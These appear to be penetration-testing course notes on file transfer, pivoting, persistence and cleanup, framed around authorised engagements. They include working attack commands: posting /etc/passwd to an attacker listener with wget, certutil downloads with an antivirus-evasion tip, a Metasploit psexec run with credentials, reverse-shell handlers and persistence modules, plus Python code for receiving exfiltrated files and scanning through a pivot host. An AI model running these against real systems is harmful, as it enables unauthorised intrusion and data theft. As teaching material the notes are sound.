Week 11: File Transfers, Pivoting, Reporting

File Transfers, Pivoting, Report Writing, and Career Advice

Maintaining Access / Pivoting / Cleanup - This lesson will discuss methods of maintaining access on a network, pivoting into other networks, and how to properly clean up as you exit a network.

The Legal Side of the House - This lesson will cover the important legal aspects that a pentester must know prior to conducting a penetration test, for example having a rules of engagement document that specifies which networks can be attacked and what attack methods can be used. Knowing the common legal documents that a junior pentester may encounter will give him or her an advantage early in their career.

Report Writing - This lesson will cover the importance of report writing in penetration testing and walk through what should be included in a penetration test report. A demo penetration test report will be provided that covers many of the findings we have discussed in prior chapters. This will give students a clear understanding of what is expected in a penetration test report and how to write one effectively.

File Transfers

Linux

# HOST FILES (run from the directory that holds the files to serve)
python -m SimpleHTTPServer 80     # Python 2
# OR
python3 -m http.server 80         # Python 3
python -m pyftpdlib -p 21         # FTP (pip install pyftpdlib); anonymous, read-only by default

# GRAB FILES
wget http://<ip>:80/secrets.txt
# RECEIVE FILES
nc -nvlp <port> > file            # redirect the listener's output into a new file
# SEND FILES
## nc
nc <ip> <port> < file
## wget (HTTP POST to a nc listener); the receiver has to strip the HTTP headers
wget --post-file=/etc/passwd 192.168.202.128:8081
tail -n +10 file > clean_file     # keep line 10 onwards: drops the 9 header lines wget sends by default
                                  # (check the header count with head first; it changes if wget's options change)
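The `tail -n +10` trick above breaks as soon as the sender emits a different number of header lines. The following is an added example, not code from the course, that does the receiving side properly: `extract_body()` cleans a raw capture taken with `nc -nvlp <port> > file` by cutting at the blank line that ends the headers and honouring Content-Length, and `serve()` is a drop-in replacement for the nc listener that writes only the POSTed body to disk. The sample capture is constructed to look like what wget sends; the port and output filename are assumptions.

```python
"""Receive a file sent with `wget --post-file`, keeping only the body (added example)."""
import http.server
import socketserver
import sys

# Constructed sample: what `nc -nvlp 8081 > file` records when wget POSTs one line of /etc/passwd.
SAMPLE_BODY = b"root:x:0:0:root:/root:/bin/bash\n"
SAMPLE_CAPTURE = (
    b"POST / HTTP/1.1\r\n"
    b"User-Agent: Wget/1.20.3 (linux-gnu)\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: identity\r\n"
    b"Host: 192.168.202.128:8081\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: %d\r\n" % len(SAMPLE_BODY)
    + b"\r\n"
    + SAMPLE_BODY
)


def extract_body(raw: bytes) -> bytes:
    """Strip the request line and headers from a raw HTTP POST capture.

    The headers end at the first blank line (CRLF CRLF, or LF LF for sloppy
    senders). When a Content-Length header is present only that many body
    bytes are returned, so trailing junk in the capture is discarded.
    """
    sep = raw.find(b"\r\n\r\n")
    if sep != -1:
        head, body = raw[:sep], raw[sep + 4:]
    else:
        sep = raw.find(b"\n\n")
        if sep == -1:
            raise ValueError("no end-of-headers blank line found")
        head, body = raw[:sep], raw[sep + 2:]

    length = None
    for line in head.splitlines():
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    return body if length is None else body[:length]


class UploadHandler(http.server.BaseHTTPRequestHandler):
    """Append each POST body to out_file; the HTTP headers never reach the disk."""

    out_file = "received.bin"  # assumed default, overridden by serve()

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        data = self.rfile.read(length)
        with open(self.out_file, "ab") as fh:
            fh.write(data)
        self.send_response(200)
        self.end_headers()
        self.log_message("wrote %d bytes to %s", len(data), self.out_file)


def serve(port: int = 8081, out_file: str = "received.bin") -> None:
    """Listen on all interfaces, replacing `nc -nvlp <port> > file` for HTTP POST uploads."""
    UploadHandler.out_file = out_file
    with socketserver.TCPServer(("0.0.0.0", port), UploadHandler) as httpd:
        httpd.serve_forever()


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 8081)
```

Run `python3 receive.py 8081` on the attacking box and `wget --post-file=/etc/passwd http://<ip>:8081/` on the target; the file lands in `received.bin` with no header lines to trim. Keep-alive means wget may hold the connection open briefly after the POST, which is harmless here because the handler reads exactly Content-Length bytes.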

Windows

# Windows Defender can flag certutil downloads; one workaround is to split the file into
# pieces on the attacker side and reassemble it on the target
# GRAB FILES - HTTP
C:\Users\fcastle>certutil -urlcache -f http://<ip>/secrets.txt secrets.txt

# GRAB FILES - FTP (against the pyftpdlib server started above)
C:\Users\fcastle>ftp <ip>
ftp> get <file>

Meterpreter

msf5 > use windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.202.134
msf5 exploit(windows/smb/psexec) > set smbdomain marvel
msf5 exploit(windows/smb/psexec) > set smbpass Password1
msf5 exploit(windows/smb/psexec) > set smbuser fcastle
msf5 exploit(windows/smb/psexec) > set target 2        # Native upload (no PowerShell needed on the target)
msf5 exploit(windows/smb/psexec) > run
...
meterpreter > cd c:\\users                              # backslashes are doubled in meterpreter paths
meterpreter > upload /root/files/secrets.txt c:\\secrets.txt
meterpreter > download c:\\secrets.txt secrets.txt

Maintaining Access

Persistence is dangerous and usually unnecessary for junior to mid-level pentesting (time-limited engagements, not red teaming). A persistence payload typically leaves a port or an unauthenticated callback on the machine, so anyone who finds it can use it until it is removed. You then have to go back in, stop and delete the service, and remove the registry entries. The module writes an RC file you can run to delete the files for you, but it remains dangerous and generally unnecessary.

Persistence Scripts

meterpreter > run persistence -h            # legacy script; msf5 warns it is deprecated in favour of the modules below
exploit/windows/local/persistence           # drops a VBS payload on disk and starts it from a registry Run key
exploit/windows/local/registry_persistence  # keeps the payload entirely in the registry

If you want to get a meterpreter shell back:

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# use a common port such as 443 so the callback blends in with normal traffic
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost 192.168.202.128

Scheduled Tasks

run scheduleme
run schtaskabuse

Metsvc

run metsvc -A

Pivoting

Suppose you have gained access to a machine on the 192.168.x.x network that is dual-homed with a 10.x.x.x network (the machine just needs two NICs; in VirtualBox, two network adapters). Traffic to the 10.x network has to go through that machine, which makes it the pivot.

# Check for other networks (besides ipconfig)
route print      # routing table: a second interface or a non-default route reveals another network
arp -a           # neighbours this box has talked to recently, including ones on the other subnet
netstat          # active connections show which remote hosts this box talks to

Scanning through a pivot is slow, because every probe is relayed through the Meterpreter session, but once a route to the 10.x network has been added through that session (Metasploit's autoroute post module does this) the built-in TCP port scanner works:

use auxiliary/scanner/portscan/tcp
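Because relaying each probe through the session is so slow, an alternative is to copy a small scanner to the dual-homed host with one of the file-transfer methods above and scan the second network natively from there. The following is an added example, not part of the course material: a threaded TCP connect scanner in the spirit of `auxiliary/scanner/portscan/tcp`. It assumes Python 3 is available on the pivot; the `10.0.0.0/24` target and the port list are assumptions to be replaced with whatever `route print` revealed.

```python
"""Threaded TCP connect scanner to run natively on a pivot host (added example)."""
import ipaddress
import socket
import sys
from concurrent.futures import ThreadPoolExecutor

# Assumed default port list; pass your own as a comma-separated argument.
COMMON_PORTS = [21, 22, 23, 25, 53, 80, 135, 139, 443, 445, 1433, 3306, 3389, 5985, 8080]


def probe(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True when a full TCP handshake to host:port succeeds (connect scan)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable
        return False


def scan(host: str, ports, timeout: float = 0.5, workers: int = 64) -> list:
    """Probe the given ports concurrently; return the open ones in ascending order."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return sorted(p for p, is_open in zip(ports, results) if is_open)


def scan_network(target, ports, timeout: float = 0.5) -> dict:
    """Scan a CIDR string or an iterable of hosts; return {host: [open ports]} for live hosts only."""
    if isinstance(target, str):
        hosts = [str(h) for h in ipaddress.ip_network(target, strict=False).hosts()]
    else:
        hosts = list(target)
    found = {}
    for host in hosts:
        open_ports = scan(host, ports, timeout)
        if open_ports:
            found[host] = open_ports
    return found


if __name__ == "__main__":
    # Assumed usage: python3 scan.py 10.0.0.0/24 21,22,80,445,3389
    target = sys.argv[1] if len(sys.argv) > 1 else "10.0.0.0/24"
    ports = [int(p) for p in sys.argv[2].split(",")] if len(sys.argv) > 2 else COMMON_PORTS
    for host, open_ports in scan_network(target, ports).items():
        print(host, ",".join(str(p) for p in open_ports))
```

A connect scan completes the handshake, so it is logged by any host-based firewall or service on the other side; that is the trade-off for not needing raw sockets or administrator rights on the pivot. Remember that the scanner itself is one of the binaries the cleanup list at the end of this page says to remove.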

Cleanup

The cleanup process covers what must be removed from the client's systems once the penetration test has been completed: every user account, binary and configuration change made during the test. It does not mean removing logs; the client's logs are their evidence of what happened and are left alone.

  • Remove all executables, scripts and temporary files from a compromised system. If possible, use a secure-delete method for removing the files and folders.

  • Return system settings and application configuration parameters to their original values if they were modified during the assessment.

  • Remove all backdoors and/or rootkits installed.

  • Remove any user accounts created for connecting back to compromised systems.

Report Writing

Career Advice
